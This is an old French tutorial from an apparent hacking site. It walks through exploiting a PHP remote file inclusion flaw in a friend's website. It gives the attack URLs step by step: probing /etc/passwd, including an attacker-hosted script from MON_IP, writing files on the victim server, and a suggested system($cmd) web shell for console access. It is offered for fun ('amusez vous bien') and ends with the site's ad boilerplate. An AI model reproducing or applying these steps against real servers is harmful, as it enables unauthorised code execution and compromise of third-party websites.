Le php est un langage de développement de page web dextrement puissant permettant entre autre de réaliser des pages webs dynamiques.

Sa syntaxe est proche du C et permet tout types de manipulation (fichiers,...).
Mais quelques fois les webmasters de sites utilisent certaines fonctions sans vraiment connaître l'utilisation de ces dernières.
Un exemple est la fonction include qui permet de faire de véritable miracles ;)

Un jour je suis tombé sur le site d'un pote dont l'url était :
http://www.site_victime.fr.st/index.php?page=index.htm
Étant un peu curieux et m'intéressant au php j'ai voulu comprendre comment fonctionnait son site.

J'ai alors vérifié les liens vers les différentes parties du site, j'ai obtenu ceci:
pour la section1:
http://www.site_victime.fr.st/index.php?page=section1.htm
pour la section2:
http://www.site_victime.fr.st/index.php?page=section2.php
pour la section3:
http://www.site_victime.fr.st/index.php?page=section3.htm

Avec quelques bases en PHP on comprend que le webmaster du site à utilisé la fonction include pour inclure ces différentes sections, le nom de la variable utilisée étant $page.
La redirection des pages s'éffectue donc dans le fichier index.php ou il doit y avoir une ligne du style:
<?
...
include($page);
...
?>
Le fichier index.php se comporte alors de la manière suivante.

Si on appelle le lien http://www.site_victime.fr.st/index.php?page=section3.htm le include redirige vers la page section3.htm, ce qui se vérifie en regardant l'url http://www.site_victime.fr.st/section3.htm.

Le serveur étant hébergé sur un serveur sous linux on va alors essayé d'aller chercher des fichiers systèmes.

Sous linux les mots de passes se trouvent dans le fichier /etc/passwd. On va donc appeler l'url :
http://www.site_victime.fr.st/index.php?page=/etc/passwd
Mais on obtient un message d'erreur le fichier doit etre *.htm ou *.php (Il a tout de même mis une protection lol)
Ce n'est pas grave, il n'accepte que les *.htm ou *.php on passera par la...;)

Maintenant on va tester si on peut appeler une page à l'extérieur, on teste alors:
http://www.site_victime.fr.st/index.php?page=http://www.google.com

Et la bingo!!! ,il affiche la page de présentation de google dans la frame du milieu.

L'include permet donc d'appeler des pages extérieures.
De plus si le fichier a des instructions en php l'include les éxecutera. 

On va donc faire passer  un script en php de l'exterieur.
Pour héberger ce script j'ai installé easyPhp qui permet de monter un serveur apache en 2 clicks.

Dans le rep www d'easyphp je crée donc un fichier(script.htm) qui contiendra le script en php suivant:
<?
echo "test d'execution de php";
?>

Attention ce fichier ne doit pas avoir une extension *.php car il faut que notre serveur apache ne l'interprète pas(sinon le serveur victime lira "test d'éxecution php").
On teste alors par l'url suivante:
http://www.site_victime.fr.st/index.php?page=http://MON_IP/script.htm

Et la bingo !!! il affiche le texte.

On peut donc lui faire exécuter n'importe quel script php.

Je refait un autre teste avec un script du style:
<?
$fp=fopen("groove.html","w");
fwrite($p,"Coucou by groove");
fclose($fp);
?>

Je rappelle
http://www.site_victime.fr.st/index.php?page=http://MON_IP/script.htm
Puis je teste http://www.site_victime.fr.st/groove.html

Et encore bingo!!! mon message est affiché ;)

Le fichier est crée sur son serveur et comporte le texte voulu.
On peut donc lui faire exécuter ce que l'on souhaite grâce au include. sympa non?
Si on veut être méchant on peut :
-faire un script du type <? system($cmd);?> si le serveur est mal configurer, de manière à avoir une console sur le serveur victime en étant le user apache (lol)
-créer et modifier les fichiers avec fopen... mais bon c pas très intelligent.
-envoyer un mail au webmaster
-uploader grâce à des scripts en php...

pour la listes des fonctions php : http://www.php.net/

Voila amusez vous bien.
Ps: Nh utilise aussi le include pour rediriger mais ne cherchez pas la faille, il est sécurisé     Héhé  ;)
Ossa ne fait d'erreur qu'au test9...;)

 

BIENTOT LE RESEAU NET-ALL SERA FIN PRET ! ET CA VA CHANGER SUR LE NET !

Webmasters gagnez de l'argent en mettat des pubs !! RENDEMENT ASSURE !!! UTILISE PAR NET-ALL !! Inscrit toi à la nouvelle lettre d'information de net-all (1 fois par mois maximum) Ton e-mail : Ajoutez Net-All.fr.st à vos favoris! Add Net-All.fr.st to your bookmark ! Faire de NET-ALL.FR.ST votre page d'accueil Set Net-all.fr.st as your default page ! Le site de vente de matos hight tech le plus connut sur le web francais ! Prix redoutables !! Ce site recherche pour vous le toute sorte de materiel informatique aux prix les plus bas ! livré chez vous et sans arnaque ! faites y un tour, vous trouverez tout ! Cherchez vos logos/big logos/sonneries polyphoniques... sur ce moteur de recherche :   Canulars téléphoniques :